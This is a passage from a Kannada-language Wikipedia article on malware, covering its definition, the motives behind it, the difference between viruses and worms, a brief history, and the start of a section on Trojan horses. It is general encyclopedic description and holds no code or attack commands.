ವಿಷಯಕ್ಕೆ ಹೋಗು

ಮಾಲ್‌ವೇರ್

ವಿಕಿಪೀಡಿಯದಿಂದ, ಇದು ಮುಕ್ತ ಹಾಗೂ ಸ್ವತಂತ್ರ ವಿಶ್ವಕೋಶ

ಮಾಲ್‌ವೇರ್ ಎಂಬುದು ಮ್ಯಾಲಿಶಿಯಸ್ ಸಾಫ್ಟ್‌ವೇರ್ ಎಂಬುದರ ಸಂಕ್ಷಿಪ್ತ ರೂಪವಾಗಿದ್ದು, ಇದು ಗಣಕದ ಮಾಲೀಕನ ಒಪ್ಪಿಗೆ ಇಲ್ಲದೇ ಆತನ ಗಣಕದ ಒಳಗೆ ಕದ್ದು ನುಸುಳುವಂತೆ ಅಥವಾ ಅದಕ್ಕೆ ಹಾನಿಯೆಸಗುವಂತೆ ವಿನ್ಯಾಸಗೊಳಿಸಲಾಗಿರುವ ಒಂದು ತಂತ್ರಾಂಶವಾಗಿದೆ. ಈ ಪದಗುಚ್ಛವು ಗಣಕ ವೃತ್ತಿನಿರತರು ಹಲವು ಬಗೆಯ ಹಗೆತನದ, ಗೊಂದಲಮಯ, ಅಥವಾ ಪೀಡಕ ತಂತ್ರಾಂಶ ಅಥವಾ ಪ್ರೊಗ್ರಾಮ್ ಕೋಡ್ ಇವುಗಳಿಗೆ ಉಪಯೋಗಿಸುವ ಸಾಮಾನ್ಯ ಹೆಸರಾಗಿದೆ[] "ಕಂಪ್ಯೂಟರ್ ವೈರಸ್" ಎನ್ನುವ ಈ ಶಬ್ಧವನ್ನು ಅನೇಕ ಸಲ ಎಲ್ಲ ಬಗೆಯ ಮಾಲ್‌ವೇರ್ ಅಲ್ಲದೇ ನಿಜವಾದ ವೈರಸ್‌ಗಳನ್ನು ಒಳಗೊಂಡು ಬಳಸಲಾಗುತ್ತದೆ.

ಒಂದು ತಂತ್ರಾಂಶವನ್ನು ಅದರ ನಿರ್ಮಾತೃನ ಉದ್ದೇಶವನ್ನು ಅರಿತುಕೊಂಡು ಅದನ್ನು ಮಾಲ್‌ವೇರ್ ಎಂದು ಪರಿಗಣಿಸಲಾಗುತ್ತದೆಯೇ ಹೊರತು ಅದರ ನಿರ್ದಿಷ್ಟ ಲಕ್ಷಣಗಳಿಂದಲ್ಲ. ಗಣಕ ವೈರಸ್‌ಗಳು, ವರ್ಮ್‌ಗಳು, ಟ್ರೋಜನ್‌ ಹಾರ್ಸ್‌ಗಳು, ಹೆಚ್ಚಿನ ರೂಟ್‌ಕಿಟ್‌ಗಳು, ಸ್ಪೈವೇರ್‌, ವಿಶ್ವಾಸಾರ್ಹವಲ್ಲದ ಆ‍ಯ್‌ಡ್‌ವೇರ್‌, ಕ್ರೈಮ್‌ವೇರ್‌ ಮತ್ತು ಇತರ ದುರಾಗ್ರಹದ ಮತ್ತು ಅನಪೇಕ್ಷಿತ ತಂತ್ರಾಂಶಗಳನ್ನು ಮಾಲ್‌ವೇರ್‌ ಒಳಗೊಂಡಿದೆ. ಕಾನೂನಿನಲ್ಲಿ ಮಾಲ್‌ವೇರ್ ಅನ್ನು ಕೆಲವು ಬಾರಿ ಗಣಕ ಕಲ್ಮಷ ಎಂದು ಅರ್ಥೈಸಲಾಗುತ್ತದೆ. ಉದಾಹರಣೆಗೆ ಯುಎಸ್ಕ್ಯಾಲಿಫೋರ್ನಿಯಾ ಮತ್ತು ವೆಸ್ಟ್ ವರ್ಜಿನಿಯಾದಂತಹ ಹಲವು ರಾಜ್ಯಗಳಲ್ಲಿನ ಶಾಸನಾತ್ಮಕ ನಿಯಮಗಳಲ್ಲಿ ಹೀಗೆ ಅರ್ಥೈಸಲಾಗಿದೆ.[][]

ಎಲ್ಲ ಮಾಲ್‌ವೇರ್‍ ಗಳೂ ದೋಷಪೂರ್ಣ ತಂತ್ರಾಂಶವಾಗಬೇಕಾಗಿಲ್ಲ. ಬದಲಿಗೆ ಈ ತಂತ್ರಾಶವು ತರ್ಕಬದ್ಧ ಗುರಿಯನ್ನು ಹೊಂದಿದ್ದು ಹಾನಿಮಾಡುವ ಬಗ್ಸ್‌ಗಳನ್ನು ಒಳಗೊಂಡಿರುತ್ತದೆ.

೨೦೦೮ರಲ್ಲಿ ಪ್ರಕಟಿಸಿದ ಸಿಮಾಂಟೆಕ್‌ನ ಆರಂಭದ ಫಲಿತಾಂಶಗಳು ಹೀಗೆ ಹೇಳುತ್ತವೆ, "ದುರಾಗ್ರಹ ಪೀಡಿತ ಕೋಡ್ ಮತ್ತು ಉಳಿದ ಅನಪೇಕ್ಷಿತ ತಂತ್ರಾಂಶಗಳ ಬಿಡುಗಡೆಯ ಪ್ರಮಾಣವು ಕಾನೂನುಬದ್ಧ ತಂತ್ರಾಂಶಗಳಿಗಿಂತ ಅಧಿಕವಾಗಿದೆ."[] ಎಫ್-ಸೆಕ್ಯುರ್ ಪ್ರಕಾರ, "ಕೇವಲ ೨೦೦೭ರಲ್ಲಿ ಸೃಷ್ಟಿಸಿರುವ ಮಾಲ್‌ವೇರ್‌‍ಗಳು ಕಳೆದ ಇಪ್ಪತ್ತು ವರ್ಷಗಳಲ್ಲಿ ಇದ್ದಷ್ಟಿವೆ."[] ಅಪರಾಧಿಗಳಿಂದ ಬಳಕೆದಾರನವರೆಗೆ ಮಾಲ್‌ವೇರ್ ಸಾಗುವುದಕ್ಕೆ ಇರುವ ಹೆದ್ದಾರಿಯೆಂದರೆ ಅದು ಅಂತರಜಾಲ: ಅದರಲ್ಲಿಯೂ ಇಮೇಲ್ ಮತ್ತು ವರ್ಲ್ಡ್ ವೈಡ್ ವೆಬ್.[]

ವಿಸ್ತಾರವಾಗಿ ಹರಡಿರುವ ಅಣಿಗೊಂಡ ಅಂತರಜಾಲ ಸಂಬಂಧಿ ಅಪರಾಧಗಳಿಗೆ ಮಾಲ್‌ವೇರ್ ಮುಖ್ಯ ವಾಹನವಾಗಿ ಬೆಳೆಯುತ್ತಿರುವುದು, ವಿಶಿಷ್ಟವಾದ, ಹೊಸತಾಗಿ ಉತ್ಪಾದಿಸಲಾಗುತ್ತಿರುವ ವೃತ್ತಿಪರವಾದ ಮಾಲ್‌ವೇರ್‌ಗಳ ವಿರುದ್ಧ ರಕ್ಷಣೆ ನೀಡುವಲ್ಲಿ, ಸಾಂಪ್ರದಾಯಿಕ ಮಾಲ್‌ವೇರ್ ರಕ್ಷಣಾ ತಂತ್ರಗಳು ಸಾಮರ್ಥ್ಯವನ್ನು ಹೊಂದಿರದಿರುವುದು, ಅಂತರಜಾಲದಲ್ಲಿ ವ್ಯವಹಾರ ಮಾಡುತ್ತಿರುವವರಿಗಾಗಿ ಹೊಸ ವಿಚಾರವನ್ನು ಅಳವಡಿಸಿಕೊಳ್ಳವುದನ್ನು ಅನಿವಾರ್ಯವಾಗಿಸಿದೆ. ಕೆಲ ಪ್ರಮಾಣದ ಅಂತರಜಾಲ ಬಳಕೆದಾರರು ಒಂದು ಅಥವಾ ಇನ್ನೊಂದು ಕಾರಣಗಳಿಂದಾಗಿ ಯಾವಾಗಲೂ ಬಾಧಿತರಾಗಿರುತ್ತಾರೆ ಮತ್ತು ಅವರು ಬಾಧಿತ ಗ್ರಾಹಕರೊಂದಿಗೆ ವ್ಯವಹಾರವನ್ನು ಮುಂದುವರಿಸಬೇಕಾದ ಅಗತ್ಯವಿರುತ್ತದೆ. ಇದರ ಪರಿಣಾಮವಾಗಿ ಗ್ರಾಹಕರ ಗಣಗಳಲ್ಲಿ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತಿರುವ ಮುಂದುವರಿದ ಮಾಲ್‌ವೇರ್‌ಗಳೊಂದಿಗೆ ಸಹಕರಿಸುವ ಮೋಸದ ಚಟುವಟಿಕೆಗಳನ್ನು ಕಂಡು ಹಿಡಿಯುದಕ್ಕೆ ರೂಪಿಸಿದ ಬ್ಯಾಕ್-ಆಫೀಸ್ ಸಿಸ್ಟಮ್‌‌ಗಳಿಗೆ ಹೆಚ್ಚಿನ ಆಧ್ಯತೆ ನೀಡಲಾಗುತ್ತಿದೆ.[]

ಉದ್ದೇಶಗಳು

[ಬದಲಾಯಿಸಿ]

ಹಲವು ಮೊದಲ ಸೋಂಕುಕಾರಕ ಪ್ರೋಗ್ರಾಮ್‌ಗಳು, ಜೊತೆಯಲ್ಲಿ ಮೊದಲ ಅಂತರಜಾಲ ವರ್ಮ್ ಮತ್ತು ಅನೇಕ ಸಂಖ್ಯೆಯಲ್ಲಿನ ಎಂಎಸ್-ಡೋಸ್ ವೈರಸ್‌ಗಳು, ಇವುಗಳನ್ನು ರಚಿಸಲಾಗಿದ್ದೇ ಪ್ರಯೋಗಗಳಾಗಿ ಅಥವಾ ಕುಚೇಷ್ಟೆಯಾಗಿ. ಒಟ್ಟಾರೆಯಲ್ಲಿ ಇವು ತೊಂದರೆಯಿಲ್ಲದ ಅಥವಾ ಕೇವಲ ಕಿರಿಕಿರಿ ಮಾಡುವ ಉದ್ದೇಶವನ್ನು ಹೊಂದಿದ್ದವೇ ಹೊರತು ಗಣಕಗಳಿಗೆ ತೀವ್ರ ನಷ್ಟವನ್ನುಂಟು ಮಾಡುವುದಕ್ಕಾಗಿಯಂತೂ ಅಲ್ಲವೇ ಅಲ್ಲ. ಕೆಲವು ಸಂದರ್ಭಗಳಲ್ಲಿ ಇವುಗಳ ತಯಾರಕರಿಗೆ ಇದು ಮಾಡಬಹುದಾದ ಕೆಡುಕಿನ ಅರಿವೇ ಇರುವುದಿಲ್ಲ. ಯುವ ಪ್ರೋಗ್ರಾಮರ್‌ಗಳು ಈ ವೈರಸ್‌ಗಳು ಮತ್ತು ಅದರ ಕಾರ್ಯತಂತ್ರಗಳ ಬಗ್ಗೆ ಕಲಿಯುತ್ತಿರುವಾಗ ಇವುಗಳು ಯಾವ ಪ್ರಮಾಣದಲ್ಲಿ ಹರಡಬಹುದೆಂಬ ಕೇವಲ ಕುತೂಹಲ ಮಾತ್ರದಿಂದ ಇವನ್ನು ಬರೆದಿದ್ದರು. ೧೯೯೯ರ ನಂತರದ ಹೊತ್ತಿನಲ್ಲಿ, ವ್ಯಾಪಕವಾಗಿ ಹರಡಿದ್ದ ಮೆಲಿಸ್ಸಾ ವೈರಸ್‌ನ್ನು ಮುಖ್ಯವಾಗಿ ಕುಚೇಷ್ಟೆಯ ಉದ್ದೇಶದಿಂದ ಬರೆಯಲಾಗಿತ್ತು.

ವಿಧ್ವಂಸಕ ಕೃತ್ಯಕ್ಕೆ ಸಂಬಂಧಿಸಿದ ಹಗೆಯ ಉದ್ದೇಶವನ್ನು ತೊಂದರೆ ಅಥವಾ ಮಾಹಿತಿ ನಷ್ಟ ಮಾಡಲೆಂದು ವಿನ್ಯಾಸಗೊಳಿಸಿದ ತಂತ್ರಾಂಶಗಳಲ್ಲೂ ಕಾಣಬಹುದು. ಅನೇಕ ಡಾಸ್ ವೈರಸ್‌ಗಳು, ಮತ್ತು ವಿಂಡೋಸ್ ಎಕ್ಸ್‌ಪ್ಲೋರ್‌ಜಿಪ್ ವರ್ಮ್, ಇವುಗಳನ್ನು ಹಾರ್ಡ್ ಡಿಸ್ಕಿನಲ್ಲಿರುವ ಕಡತಗಳನ್ನು ನಾಶಪಡಿಸಲೆಂದು ಅಥವಾ ತಪ್ಪಾದ ದತ್ತಾಂಶಗಳನ್ನು ಬರೆದು ಕಡತ ವ್ಯವಸ್ಥೆಯನ್ನು ಹಾಳುಮಾಡಲೆಂದು ವಿನ್ಯಾಸಗೊಳಿಸಲಾಗಿತ್ತು. ಸಂಪರ್ಕಜಾಲದಿಂದ ಉಗಮವಾದ ವರ್ಮುಗಳು, ಅಂದರೆ ೨೦೦೧ರ ಕೋಡ್ ರೆಡ್ ವರ್ಮ್ ಅಥವಾ ರಾಮೆನ್ ವರ್ಮ್‌ಗಳು ಇದೇ ವಿಭಾಗಕ್ಕೆ ಸೇರುತ್ತವೆ. ಜಾಲಪುಟಗಳನ್ನು ವಿಧ್ವಂಸಿಸಲೆಂದು ವಿನ್ಯಾಸಗೊಳಿಸಿದ ಈ ವರ್ಮುಗಳು ಆನ್‌ಲೈನ್ ಸಮಾನ ವಸ್ತುವಾದ ಗ್ರಾಫಿಟಿ ಟ್ಯಾಗಿಂಗ್‌ ಅನ್ನು ಹೋಲುವಂತಿದ್ದು, ಈ ವರ್ಮು ನುಸುಳಿದಲೆಲ್ಲ ರಚನಾಕಾರರ ಉಪನಾಮ ಅಥವಾ ಮೈತ್ರಿ ಕೂಟ ಕಂಡುಬರುತ್ತದೆ.

ಹಾಗಿದ್ದರೂ, ವ್ಯಾಪಕವಾಗಿ ಹೆಚ್ಚುತ್ತಿರುವ ಬ್ರಾಡ್‌ಬ್ಯಾಂಡ್ ಅಂತರಜಾಲ ಪ್ರವೇಶಾಧಿಕಾರದಿಂದ ದುರಾಗ್ರಹ ಪೀಡಿತ ತಂತ್ರಾಂಶಗಳನ್ನು ಲಾಭ ಗಿಟ್ಟಿಸುವ ಉದ್ದೇಶದಿಂದ ಹೆಚ್ಚು ಕಡಿಮೆ ಶಾಸನಬದ್ಧವಾಗಿ(ಒತ್ತಾಯದ ಜಾಹೀರಾತುಗಳು) ಅಥವಾ ದುರುದ್ದೇಶಕ್ಕಾಗಿ ವಿನ್ಯಾಸಗೊಳಿಸಲಾಗುತ್ತಿದೆ. ನಿದರ್ಶನಕ್ಕೆ ಹೇಳುವುದಾದರೆ, ೨೦೦೩ರಿಂದ ವ್ಯಾಪಕವಾಗಿ ಹರಡಲ್ಪಟ್ಟ ಹೆಚ್ಚಿನ ವೈರಸ್‌ಗಳ ಮತ್ತು ವರ್ಮಗಳ ವಿನ್ಯಾಸವು ಬಳಕೆದಾರನ ಗಣಕವನ್ನು ನಿಯಂತ್ರಣಕ್ಕೆ ತೆಗೆದುಕೊಂಡು ಕಾಳ ಸಂತೆಯಲ್ಲಿ ತನ್ನ ಸ್ವಂತ ಲಾಭಕ್ಕೆ ಬಳಸಿಕೊಳ್ಳುವಂತಿತ್ತು.[ಸೂಕ್ತ ಉಲ್ಲೇಖನ ಬೇಕು] ಸೋಂಕಿನ "ಜೊಂಬಿ ಗಣಕಗಳ"ನ್ನು ಇಮೇಲ್ ಸ್ಪ್ಯಾಮ್‌ಅನ್ನು ಕಳಿಸಲು, ಕಾಂಟ್ರಾಬ್ಯಾಂಡ್ ದತ್ತಾಂಶಗಳನ್ನು ಹೋಸ್ಟ್ ಮಾಡಲು, ಉದಾಹರಣೆಗೆ ಮಕ್ಕಳ ಅಶ್ಲೀಲ ಸಾಹಿತ್ಯ,[] ಅಥವಾ ಸುಲಿಗೆಯ ಮಾದರಿಯಲ್ಲಿ ವಿತರಿಸಲಾದ-ಸೇವಾ-ನಿರಾಕರಣೆಯ ದಾಳಿಯಲ್ಲಿ ತೊಡಗಿಸಿಕೊಳ್ಳುವುದು ಆಗಿದೆ.

ಮಾಲ್‌ವೇರ್‌ನ ಇನ್ನೊಂದು ಲಾಭದ ವರ್ಗವಾಗಿ ಸ್ಪೈವೇರ್ ಪ್ರೊಗ್ರಾಮ್‌ಗಳನ್ನು ಬಳಕೆದಾರನ ಅಂತರಜಾಲ ಭೇಟಿ ಇತಿಹಾಸವನ್ನು ಗಮನಿಸುವುದಕ್ಕೆ ವಿನ್ಯಾಸಗೊಳಿಸಲಾಗಿದೆ. ಇದು ಅನಪೇಕ್ಷಿತ ಜಾಹೀರಾತುಗಳನ್ನು ಪ್ರದರ್ಶಿಸುತ್ತದೆ, ಅಥವಾ ಸಂಬಂಧಿತ ಮಾರುಕಟ್ಟೆಗೆ ಪುನರ್ ನಿರ್ದೇಶನ ಮಾಡುವ ಮೂಲಕ ಸ್ಪೈವೇರ್ ರಚನೆಕಾರನಿಗೆ ಆದಾಯ ತಂದುಕೊಡುತ್ತವೆ. ಸ್ಪೈವೇರ್ ತಂತ್ರಾಂಶವು ವೈರಸ್‌ಗಳಂತೆ ಹರಡುವುದಿಲ್ಲ: ಇವು ಸಾಮಾನ್ಯವಾಗಿ ಭದ್ರತೆಯಲ್ಲಿಯ ನ್ಯೂನತೆಯನ್ನು ಬಳಸಿಕೊಂಡು ಸ್ಥಾಪಿತವಾಗಿರುತ್ತವೆ ಅಥವಾ ಇವು ಬಳಕೆದಾರ ಸ್ಥಾಪಿಸಿದ ತಂತ್ರಾಶಗಳ ಜೊತೆ ಸೇರಿರುತ್ತವೆ. ಉದಾಹರಣೆಗೆ ಪಿಯರ್-ಟು-ಪಿಯರ್ ಅಪ್ಲಿಕೇಶನ್‌ಗಳು.

ಪೀಡಕ ಮಾಲ್‌ವೇರ್‌: ವೈರಸ್‌ಗಳು ಮತ್ತು ವರ್ಮುಗಳು

[ಬದಲಾಯಿಸಿ]

ಹೆಚ್ಚು ಗೊತ್ತಿರುವ ಮಾಲ್‌ವೇರ್ ಬಗೆಗಳೆಂದರೆ ವೈರಸ್‌ಗಳು ಮತ್ತು ವರ್ಮು ಗಳು. ಇವುಗಳನ್ನು ಇವು ಹರಡುವ ರೀತಿಯ ಮೇಲೆ ಗುರುತಿಸಲಾಗುತ್ತದೆಯೇ ಹೊರತು ಅವುಗಳ ನಡವಳಿಕೆಯಿಂದಲ್ಲ. ಕಂಪ್ಯೂಟರ್ ವೈರಸ್ ಎನ್ನುವ ಹೆಸರನ್ನು ಆ ತಂತ್ರಾಂಶಕ್ಕೆ ಬಳಸಲಾಗುತ್ತದೆ, ಯಾವುದರಿಂದ ಕಾರ್ಯಗತಗೊಳಿಸಬಲ್ಲ ತಂತ್ರಾಂಶದಲ್ಲಿ ಸೋಂಕು ಉಂಟು ಮಾಡಬಹುದೊ ಮತ್ತು ಅದರಿಂದಾಗಿ ಆ ತಂತ್ರಾಂಶವು ಸಕ್ರಿಯ ವಾದಾಗ, ವೈರಸ್‌ ಅನ್ನು ಉಳಿದ ಕಾರ್ಯಗತಗೊಳಿಸಬಲ್ಲ ತಂತ್ರಾಂಶಗಳಿಗೂ ಹರಡಬಲ್ಲದು. ವೈರಸ್‌ಗಳು ಪೇಲೋಡ್ ಅನ್ನು ಹೊಂದಿರಬಹುದು. ಅವು ದುರಾಗ್ರಹವನ್ನು ಹೊಂದಿರುವ ಕಾರ್ಯಗಳನ್ನು ಹೆಚ್ಚಾಗಿ ನಿರ್ವಹಿಸಬಲ್ಲವು. ಒಂದು ವರ್ಮು , ಇನ್ನೊಂದು ರೀತಿಯಲ್ಲಿ, ತಂತ್ರಾಂಶವಾಗಿದ್ದು, ಅದು ತನ್ನನ್ನು ತಾನೇ ಸಂಪರ್ಕಜಾಲದಲ್ಲಿ ಪ್ರಸಾರಗೊಳಿಸಿಕೊಂಡು ಉಳಿದ ಗಣಕಗಳಲ್ಲಿ ಸೋಂಕುವುಂಟು ಮಾಡಬಲ್ಲದು. ಇದು ಸಹ ಪೇಲೋಡ್ ಅನ್ನು ಒಯ್ಯಬಲ್ಲದು.

ಈ ವ್ಯಾಖ್ಯಾನಗಳನ್ನು ಗಮನಿಸಿದರೆ ವೈರಸ್‌ಗಳು ಪ್ರಸಾರ ಹೊಂದಲು ಬಳಕೆದಾರನ ಹಸ್ತಕ್ಷೇಪವನ್ನು ಬಯಸುತ್ತವೆ, ಅದೇ ವರ್ಮುಗಳು ಸ್ವಯಂಚಾಲಿತವಾಗಿ ತಮ್ಮನ್ನು ತಾವೇ ಪ್ರಸಾರ ಮಾಡಿಕೊಳ್ಳಬಲ್ಲವು. ಈ ವ್ಯತ್ಯಾಸವನ್ನು ಗಮನದಲ್ಲಿಟ್ಟುಕೊಂಡು, ವೈರಸ್‌ ಎಂದರೆ ವರ್ಮಿನಂತಲ್ಲದೇ, ಇಮೇಲ್ ಅಥವಾ ಮೈಕ್ರೊಸಾಫ್ಟ್ ವರ್ಡ್ ಡಾಕ್ಯುಮೆಂಟುಗಳ ಮೂಲಕ ಪಸರಿಸುವ ಸೋಂಕಾಗಿದ್ದು, ಇದು ಈ ಸೋಂಕನ್ನು ಉಂಟು ಮಾಡಲು ಕಡತ ಅಥವಾ ಇಮೇಲ್ ತೆರೆಯುವವನ ಮೇಲೆ ಅವಲಂಬಿತವಾಗಿರುತ್ತದೆ.

ಕೆಲವು ವೃತ್ತಿಪರ ಬರಹಗಾರರು ಮತ್ತು ಜನಪ್ರಿಯ ಮಾಧ್ಯಮಗಳು ಈ ವ್ಯತ್ಯಾಸವನ್ನು ಅಪಾರ್ಥ ಮಾಡಿಕೊಂಡು ಈ ಹೆಸರುಗಳನ್ನು ಒಂದಕ್ಕೆ ಮತ್ತೊಂದನ್ನು ಪರ್ಯಾಯವಾಗಿ ಬಳಸುತ್ತಾರೆ.

ವೈರಸ್‌ ಮತ್ತು ವರ್ಮುಗಳ ಕಿರುಚರಿತ್ರೆ

[ಬದಲಾಯಿಸಿ]

ಅಂತರಜಾಲವು ವ್ಯಾಪಕವಾಗಿ ಪ್ರಚಲಿತಕ್ಕೆ ಬರುವ ಮುನ್ನ, ವೈರಸ್‌ಗಳು ಫ್ಲಾಪಿ ಡಿಸ್ಕಿನ ತಂತ್ರಾಂಶ ಅಥವಾ ಬೂಟ್ ಸೆಕ್ಟರ್ನಲ್ಲಿ ಸೊಂಕನ್ನು ಉಂಟುಮಾಡಿ ಖಾಸಗಿ ಗಣಕಗಳಲ್ಲಿ ಪಸರಿಸುತ್ತಿದ್ದವು. ಈ ಕಾರ್ಯಕಗಳಲ್ಲಿನ ಮೆಷಿನ್ ಕೋಡ್‌ನ ನಿರ್ದೇಶನಗಳ ಜೊತೆ ತಮ್ಮದೊಂದು ಕಾಪಿಯನ್ನು ಸೇರಿಸಿಟ್ಟು, ತಂತ್ರಾಂಶ ಕಾರ್ಯಗತವಾದಾಗಲೆಲ್ಲ ಅಥವಾ ಈ ಡಿಸ್ಕನ್ನು ಬೂಟ್ ಮಾಡಿದಾಗೆಲ್ಲ ವೈರಸ್‌ ಸಕ್ರಿಯವಾಗುತಿತ್ತು. ಮೊದಲಿನ ಗಣಕ ವೈರಸ್‌ಗಳನ್ನು ಆ‍ಯ್‌ಪಲ್ II ಮತ್ತು ಮ್ಯಾಕಿಂತೋಶ್ ಇವುಗಳಿಗೆಂದು ಬರೆಯಲಾಗಿತ್ತು. ಆದರೂ ಇವು IBM PC ಮತ್ತು MS-DOS ಸಿಸ್ಟಮ್‌ಗಳು ಪ್ರಾಬಲ್ಯಕ್ಕೆ ಬಂದಾಗ ಇನ್ನಷ್ಟು ವ್ಯಾಪಕವಾಗಿ ಪಸರಿಸಿದವು. ಕಾರ್ಯಗತಗೊಳಿಸುವಂತಹ ಸೋಂಕುಕಾರಕ ವೈರಸ್‌ಗಳು ಬಳಕೆದಾರರ ತಂತ್ರಾಂಶ ವಿನಿಮಯ ಅಥವಾ ಬೂಟ್ ಪ್ಲಾಪಿಗಳ ಮೇಲೆ ಅವಲಂಬಿತವಾಗಿವೆ. ಹಾಗಾಗಿ ಅವು ಗಣಕ ಹೊಬಿಯಸ್ಟ್ ಸರ್ಕಲ್‌ನಲ್ಲಿ ಅಗಾಧವಾಗಿ ಪಸರಿಸುತ್ತವೆ.

ಮೊದಲ ವರ್ಮುಗಳು, ಅಂದರೆ ಸಂಪರ್ಕಜಾಲದಿಂದ ಜನಿಸಿದ ಸೋಂಕುಕಾರಕ ತಂತ್ರಾಶಗಳು ಹುಟ್ಟಿದ್ದು ಖಾಸಗಿ ಗಣಕಗಳಲ್ಲಿ ಅಲ್ಲ, ಬದಲಿಗೆ ಹಲವು ಕಾರ್ಯವನ್ನು ನಿರ್ವಹಿಸಬಲ್ಲ ಯುನಿಕ್ಸ್ ಸಿಸ್ಟ್‌ಮ್‌ಗಳಲ್ಲಿ. ಮೊದಲ ಹೆಸರುವಾಸಿಯಾದ ವರ್ಮು ೧೯೮೮ರ ಇಂಟರ್‌ನೆಟ್ ವರ್ಮ್. ಇದುಸನ್ ಓಎಸ್ ಮತ್ತು ವಾಕ್ಸ್ ಬಿಎಸ್ಡಿ ಸಿಸ್ಟಮ್‌ಗಳಲ್ಲಿ ಸೋಂಕನ್ನು ಪಸರಿಸಿತ್ತು. ಈ ವರ್ಮು ವೈರಸ್‌ನಂತೆ ಉಳಿದ ತಂತ್ರಾಂಶಗಳಲ್ಲಿ ತನ್ನನ್ನು ತಾನೇ ಸೇರಿಸಿಕೊಂಡಿರಲಿಲ್ಲ. ಅದರ ಬದಲು, ಇದು ಸಂಪರ್ಕಜಾಲದ ಸರ್ವರ್ ಪ್ರೋಗ್ರಾಮ್‌ಗಳಲ್ಲಿನ ಭದ್ರತಾ ನ್ಯೂನತೆಯ ದುರ್ಲಾಭ ಪಡೆದು ಸ್ವತಃ ತಾನೇ ಒಂದು ಪ್ರೊಸೆಸ್ ಆಗಿ ಕಾರ್ಯ ಎಸಗತೊಡಗಿತು. ಇದೇ ಸಮಾನ ನಡುವಳಿಕೆಯನ್ನು ಸಧ್ಯದ ವರ್ಮುಗಳು ಬಳಸುತ್ತವೆ.

೧೯೯೦ರಲ್ಲಿ ಮೈಕ್ರೊಸೊಫ್ಟ್ ವಿಂಡೋಸ್ ಪ್ಲಾಟ್‌ಫಾರಂ ಉದಯವಾಗುತ್ತಿದ್ದ ಹಾಗೆ ಮತ್ತು ಇದರ ಅಪ್ಲಿಕೇಶನ್‌ಗಳ ಹೊಂದಿಕೊಳ್ಳುವ ಮ್ಯಾಕ್ರೊ ಸಿಸ್ಟಮ್‌ಗಳ ಕಾರಣದಿಂದ ಸೋಂಕುಕಾರಕ ಕೋಡ್‌ಗಳನ್ನು ಮೈಕ್ರೊಸಾಫ್ಟ್ ವರ್ಡ್ ಮತ್ತು ಉಳಿದ ಪ್ರೋಗ್ರಾಮುಗಳ ಮ್ಯಾಕ್ರೊ ಲ್ಯಾಂಗ್ವೇಜಿನಲ್ಲಿ ಬರೆಯಲು ಸಾಧ್ಯವಾಯಿತು. ಈ ಮ್ಯಾಕ್ರೊ ವೈರಸ್‌ಗಳು ಅಪ್ಲಿಕೇಶನ್‌ಗಳನ್ನು ಬಿಟ್ಟು ಕಡತಗಳನ್ನು ಮತ್ತು ಟೆಂಪ್ಲೇಟುಗಳಲ್ಲಿ ಸೋಂಕನ್ನು ಪಸರಿಸುತ್ತವೆ. ಆದರೆ, ವರ್ಡ್‌ಡಾಕ್‌ನಲ್ಲಿರುವ ಮ್ಯಾಕ್ರೊಗಳು ಜಾರಿಯಾಗಲ್ಪಡುವ ಕೋಡ್‌ನಲ್ಲಿರುತ್ತವೆ ಎಂಬ ವಸ್ತುಸ್ಥಿತಿಯ ಮೇಲೆ ನಂಬಿಕೆ ಇಡಬಹುದು.

ಈ ದಿನಗಳಲ್ಲಿ ವರ್ಮುಗಳನ್ನು ಹೆಚ್ಚಾಗಿ ವಿಂಡೋಸ್ OSಗಾಗಿ ಬರೆಯಲಾಗುತ್ತದೆ. ಆದಾಗ್ಯೂ ಸಣ್ಣ ಪ್ರಮಾಣದಲ್ಲಿ ಲಿನಕ್ಸ್ ಮತ್ತು ಯುನಿಕ್ಸ್ ಸಿಸ್ಟ್‌ಮ್‌ಗಳಿಗೂ ಬರೆಯಲಾಗುತ್ತದೆ. ವರ್ಮುಗಳು ಇಂದಿನ ದಿನಗಳಲ್ಲಿ ೧೯೮೮ರ ಇಂಟರ್‌ನೆಟ್ ವರ್ಮ್‌ನ ಹಳೆಯ ಸಾಮಾನ್ಯ ರೀತಿಯಲ್ಲೇ ಕೆಲಸ ಮಾಡುತ್ತವೆ. ಅವು ಸಂಪರ್ಕಜಾಲವನ್ನು ಸ್ಕಾನ್ ಮಾಡುತ್ತಾ ದುರ್ಬಲ ಗಣಕಗಳಲ್ಲಿ ತಮ್ಮ ಪ್ರತಿಕೃತಿ ಸ್ಥಾಪಿಸುವುದಕ್ಕೆ ಇರುವ ಅನುಕೂಲವನ್ನು ಹುಡುಕುತ್ತಿರುತ್ತವೆ.

ಗುಪ್ತ ಅಡಕ: ಟ್ರೋಜನ್ ಹಾರ್ಸ್‌ಗಳು, ರೂಟ್‌ಕಿಟ್‌ಗಳು ಮತ್ತು ಬ್ಯಾಕ್‌ಡೋರ್‌ಗಳು

[ಬದಲಾಯಿಸಿ]

ಟ್ರೋಜನ್ ಹಾರ್ಸ್‌ಗಳು

[ಬದಲಾಯಿಸಿ]

ಒಂದು ದುರಾಗ್ರಹ ಪ್ರೊಗ್ರಾಮ್‌ಗೆ ಅದರ ಉದ್ದೇಶವನ್ನು ಈಡೇರಿಸಿಕೊಳ್ಳಲು, ಅದು ತನ್ನನ್ನು ತಾನೇ ಶಟ್‌ ಡೌನ್ ಮಾಡಿಕೊಳ್ಳದಿರುವ ಅಥವಾ ಗಣಕ ಕಾರ್ಯ ಚಲಾಯಿಸುತ್ತಿರುವಾಗ ಬಳಕೆದಾರನಿಂದ/ಆಡಳಿತಾಧಿಕಾರಿಯಿಂದ ಡಿಲೀಟ್ ಆಗದೇ ಇರುವಂತಹ ಸಾಮರ್ಥ್ಯ ಪಡೆದಿರಬೇಕು. ಗುಪ್ತ ಅಡಕವು ಸಹ ಮಾಲ್‌ವೇರ್ ಸ್ಥಾಪನೆ ಆಗುವಂತೆ ಸಹಕರಿಸುತ್ತದೆ. ದುರಾಗ್ರಹದ ಪ್ರೊಗ್ರಾಮ್‌ ತನ್ನ ನಿಜರೂಪವನ್ನು ನಿರುಪದ್ರವಿ ಅಥವಾ ಅಪೇಕ್ಷಣೀಯವಾಗಿ ಮರೆಮಾಚಿ, ಬಳಕೆದಾರರನ್ನು ತನ್ನನ್ನು ಅನುಸ್ಥಾಪಿಸಿಕೊಳ್ಳುವುದಕ್ಕೆ ಪ್ರಲೋಭಿಸುತ್ತದೆ. ಇದು ಟ್ರೋಜೊನ್ ಹಾರ್ಸ್ ಅಥವಾ 